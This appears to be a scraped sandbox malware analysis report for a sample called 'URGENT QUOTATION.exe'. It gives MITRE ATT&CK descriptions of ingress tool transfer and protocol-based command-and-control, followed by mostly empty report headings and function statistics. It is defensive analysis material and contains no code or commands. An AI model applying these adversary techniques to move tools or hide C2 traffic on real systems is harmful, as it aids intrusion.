Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report URGENT QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 00417CD5, Relevance: 338.3, APIs: 182, Strings: 10, Instructions: 2311
COMMON

Function 0041AFDC, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79
COMMON

Function 004015D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON